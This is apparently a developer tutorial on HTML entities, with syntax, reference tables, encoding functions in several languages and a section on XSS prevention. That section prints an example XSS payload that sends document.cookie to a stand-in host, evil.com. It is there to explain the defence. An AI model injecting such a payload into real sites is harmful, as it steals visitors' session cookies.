HTML Entities Encoder: Complete Character Reference Guide

Published: April 2026 • 10 min read • Developer Tools Guide

HTML entities are the mechanism that makes the web work. Without them, you couldn't display a less-than sign in your text, render accented characters reliably, or safely embed user-generated content. Every time a browser encounters &lt; and renders it as <, HTML entities are doing their job.

This guide covers the complete picture: how HTML entities work under the hood, the essential reference tables you'll use daily, encoding and decoding strategies, and the critical role entities play in preventing cross-site scripting (XSS) attacks.

Table of Contents

  1. What Are HTML Entities?
  2. Entity Syntax: Named vs. Numeric
  3. Why Entities Are Necessary
  4. Complete Entity Reference
  5. Encoding and Decoding
  6. HTML Entities and XSS Prevention
  7. Best Practices

What Are HTML Entities?

An HTML entity is a sequence of characters that represents a single character that either can't be typed directly or has special meaning in HTML. They always start with an ampersand (&) and end with a semicolon (;).

When the browser parses HTML, it replaces each entity with its corresponding character before rendering. This means &amp; in your source code becomes & on screen, and &copy; becomes ©.

The HTML specification defines over 2,000 named entities (expanded significantly in HTML5), plus support for any Unicode character via numeric references.

Entity Syntax: Named vs. Numeric

There are three ways to write an HTML entity:

Named Entities

Human-readable names defined by the HTML specification:

&amp;    → &   (ampersand)
&lt;     → <    (less-than)
&gt;     → >    (greater-than)
&copy;  → ©   (copyright)
&euro;  → €   (euro sign)
&nbsp;  → (non-breaking space)

Named entities are preferred for readability and maintainability — any developer can understand &copy; at a glance.

Decimal Numeric Entities

Unicode code point in decimal, prefixed with &#:

&#38;  → &   (ampersand)
&#60;  → <    (less-than)
&#169; → ©   (copyright)
&#8364;→ €   (euro sign)

Hexadecimal Numeric Entities

Unicode code point in hexadecimal, prefixed with &#x:

&#x26;  → &   (ampersand)
&#x3C;  → <    (less-than)
&#xA9;  → ©   (copyright)
&#x20AC;→ €   (euro sign)
💡 Tip: Named entities work for ~2,000 common characters. For anything else (emoji, obscure symbols, characters beyond the Basic Multilingual Plane), use hexadecimal numeric references with &#x.

Why Entities Are Necessary

1. Reserving Special Characters

HTML uses <, >, &, ", and ' as syntax delimiters. If you need to display these characters as content (not markup), you must encode them:

<!-- Without entities, the browser thinks this is a tag -->
<p>Use 5 &gt; 3 to compare numbers</p>

<!-- Correct: entities preserve the intended content -->
<p>Use 5 &gt; 3 to compare numbers</p>

2. Displaying Non-ASCII Characters

While UTF-8 encoding handles most characters natively, entities provide a reliable fallback for characters that might be corrupted by encoding mismatches, email clients, or legacy systems:

&eacute;  → é    (e with acute)
&ntilde;  → ñ    (n with tilde)
&uuml;    → ü    (u with umlaut)

3. Invisible and Whitespace Characters

HTML collapses multiple spaces into one. Entities let you insert precise whitespace and invisible characters:

&nbsp;  → Non-breaking space (doesn't collapse)
&ensp;  → En space (half em)
&emsp;  → Em space (full em)
&thinsp;→ Thin space
&zwj;   → Zero-width joiner (for emoji sequences)

Complete Entity Reference

The Five Essential Entities

These five entities are mandatory knowledge for every web developer:

CharacterNamedDecimalHexPurpose
&&amp;&#38;&#x26;Ampersand
<&lt;&#60;&#x3C;Less than
>&gt;&#62;&#x3E;Greater than
"&quot;&#34;&#x22;Double quote
'&apos;&#39;&#x27;Single quote (apostrophe)

Common Symbols

SymbolNamedDescription
©&copy;Copyright
®&reg;Registered trademark
&trade;Trademark
&euro;Euro
£&pound;Pound sterling
¥&yen;Yen/Yuan
¢&cent;Cent
§&sect;Section sign
±&plusmn;Plus-minus
× &times;Multiplication
÷&divide;Division
°&deg;Degree
µ&micro;Micro sign
&para;Pilcrow/paragraph
&hellip;Horizontal ellipsis
&ndash;En dash
&mdash;Em dash
&larr;Left arrow
&rarr;Right arrow
&hearts;Heart
&check;Check mark

Mathematical and Technical Symbols

SymbolNamedDescription
&le;Less than or equal
&ge;Greater than or equal
&asymp;Approximately equal
&ne;Not equal
&infin;Infinity
&radic;Square root
&sum;Summation
π&pi;Pi

Encoding and Decoding

HTML encoding converts special characters into their entity equivalents. Decoding reverses the process. This is a fundamental operation in web development, especially when handling user input.

JavaScript

// Encode HTML entities
function escapeHTML(str) {
  return str
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&apos;');
}

// Decode HTML entities
function unescapeHTML(str) {
  const el = document.createElement('textarea');
  el.innerHTML = str;
  return el.value;
}

// Modern approach: the TextEncoder API handles raw encoding,
// but for HTML entities specifically, use a sanitizer library
// like DOMPurify for comprehensive protection.

Python

import html

# Encode
encoded = html.escape(user_input)  # converts < to &lt;, & to &amp;

# Decode
decoded = html.unescape(encoded)   # converts &lt; back to <

PHP

// Encode
$encoded = htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8');

// Decode
$decoded = htmlspecialchars_decode($encoded);

HTML Entities and XSS Prevention

Cross-site scripting (XSS) is one of the most common web vulnerabilities. It occurs when an attacker injects malicious JavaScript into a web page by embedding it in user content that the page renders without sanitization.

How XSS Works

Imagine a comment section where users can post messages. An attacker submits:

<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>

If the server renders this directly into the page, the script executes in every visitor's browser, stealing their session cookies.

How Entities Prevent XSS

When you HTML-encode the attacker's input, the browser treats it as text, not markup:

&lt;script&gt;fetch(&#39;https://evil.com/steal?cookie=&#39; + document.cookie)&lt;/script&gt;

The browser displays this as literal text: <script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script> — no code execution.

⚠️ Critical: HTML entity encoding is necessary but not sufficient for XSS prevention. It protects against reflected and stored XSS in HTML context, but you also need Content-Security-Policy headers, input validation, and context-aware encoding (different escaping for JavaScript strings, URLs, and CSS).

Context-Aware Encoding

The correct encoding depends on where user data appears in the document:

Use established libraries like DOMPurify (JavaScript), bleach (Python), or your framework's built-in escaping (React's JSX, Django's {{ var|escape }}, Laravel's Blade {{ }}) rather than rolling your own.

Best Practices

  1. Always encode user-generated content. Never insert raw user input into HTML. Period.
  2. Use your framework's auto-escaping. React, Vue, Angular, Django, and Laravel all escape by default. Don't disable it.
  3. Prefer UTF-8 over entities for non-ASCII text. UTF-8 handles accented characters natively. Reserve entities for special characters and encoding contexts.
  4. Use named entities for the "big five" characters. &amp;, &lt;, &gt;, &quot;, and &apos; should be second nature.
  5. Don't double-encode. Encoding &amp; twice produces &amp;amp;, which displays as &amp; instead of &.
  6. Validate input, encode output. These are complementary defenses, not alternatives.
  7. Set the Content-Security-Policy header. Even with encoding, CSP provides defense-in-depth by blocking inline scripts.

🔒 Encode and Decode HTML Entities Instantly

Convert special characters to HTML entities and back. Supports batch conversion, Unicode lookup, and full character reference — free and instant.

Open HTML Entities Encoder →

Conclusion

HTML entities are a small but critical part of web development. They solve three fundamental problems: displaying reserved characters, representing Unicode characters reliably, and preventing XSS attacks. The five essential entities (&amp;, &lt;, &gt;, &quot;, &apos;) should be automatic in every developer's muscle memory. For everything else, keep a reference handy and let your framework's auto-escaping handle the heavy lifting. Understanding entities isn't just about knowing the syntax — it's about building secure, reliable web applications.